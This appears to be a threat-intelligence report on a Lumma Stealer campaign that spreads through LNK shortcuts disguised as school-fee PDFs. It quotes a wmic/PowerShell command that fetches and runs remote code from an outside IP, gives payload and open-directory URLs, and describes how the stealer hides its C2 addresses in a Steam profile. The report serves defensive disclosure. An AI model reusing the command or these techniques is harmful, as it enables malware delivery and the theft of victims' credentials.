Executive Summary
Lumma Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It is designed to steal sensitive data, including passwords, browser information, and cryptocurrency wallet details.
This report details an ongoing malware campaign distributing the Lumma Stealer information stealer. The campaign's primary infection vector involves using malicious LNK (shortcut) files that are crafted to appear as legitimate PDF documents. These LNK files, when executed, initiate a multi-stage infection process ultimately leading to the deployment of Lumma Stealer on the victim's machine. The campaign focuses on tricking users into executing malicious files, highlighting the importance of user awareness and robust security measures. Malware campaign targets multiple industries, including Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.
Previously, we published two in-depth research reports analyzing the Lumma Stealer campaign, detailing its tactics, techniques, and procedures (TTPs) used by threat actors to distribute and deploy the malware.
- How Threat Actors Exploit Brand Collaborations to Target Popular YouTube Channels
- Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages
Attribution and Analysis
During a drive-by compromise, the user is initially redirected to a WebDAV server while visiting certain websites, unknowingly establishing a connection. This redirection may trigger an explorer.exe window preview, displaying the contents of the WebDAV server, which hosts malicious files designed to exploit system vulnerabilities or deliver malware.
In the analyzed infrastructure, malicious files were hosted on a WebDAV server within the open directory “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”, When a user clicks to download the school fee structure, they unknowingly download a malicious "pdf.lnk" file, which appears as a PDF due to its icon.
The directory primarily contained “.lnk” file, which were weaponized to download additional malicious payloads using “mshta.exe”, a legitimate Microsoft executable designed to run Microsoft HTML Application (HTA) files.
LNK (shortcut) files are often leveraged as an entry point in phishing campaigns. By exploiting their unique features, threat actors can deceive users and bypass security measures, making them effective tools for infiltrating systems and networks.
The LNK file runs a PowerShell command that connects to a remote server, triggering the next stage of the attack. “C:\Windows\System32\Wbem\wmic.exe process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
These deceptive shortcuts, often camouflaged as legitimate executables or PDF files, entice unsuspecting users to click, ultimately compromising their systems or networks.
We extracted the script by dumping the overlay section, revealing an obfuscated JavaScript code.
Obfuscated JavaScript code in overlay section of Samarik
This function evaluates the JavaScript code stored in the variable aeQ. The use of eval is a common technique in obfuscated or malicious scripts.
A PowerShell script can be seen through the obfuscated JS script. An AES-encrypted payload and a procedure to decrypt it in CBC mode using a hardcoded decryption key are included in this PowerShell script. Simple mathematical obfuscation techniques are also used in the script.
The PowerShell script's normalized variables and functions show how the payload is downloaded and executed.
The final PowerShell script downloads extract the contents and execute “Kompass-4.1.2.exe” (Lumma Stealer) from https[:]//80.76.51[.]231/Kompass-4.1.2.exe
Lumma Stealer attempts to connect with command and control (C2) servers to exfiltrate stolen data after infecting a system. It tries to reach multiple C2 server domains; however, these servers are currently inaccessible.
The sample uses the Steam connection if it cannot access every C2 domain it owns. Steam URLs differ from C2 domains in that they have distinct decryption techniques and are stored as execution codes.
hxxps://steamcommunity.com/profiles/76561199724331900
The number 76561199724331900 follows the format of a Steam64 ID, suggesting that a Steam client or game might be attempting to resolve a network service. This indicates that a device on the network is trying to resolve a name (likely related to a Steam session or game server). The profile was created on June 28, 2024.
C2 cloaking via Steam profiles is a sophisticated evasion technique that abuses a trusted platform for stealthy command & control communication.
The threat actor most likely constructed this Steam URL, which is a profile page for a Steam account. The sample first connects to the website, parses the "actual_persona_name" tag to extract strings, and then uses the Caesar cipher method to decrypt the strings and extract C2 domains.
Based on analyzing different names mimicking legitimate PDF documents (e.g., contracts, financial reports, academic materials, and technical brochures), Lumma Stealer malware targets industries including but not limited to Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.
MITRE ATT&CK Tactics and Techniques:
Indicators of Compromise (IoCs):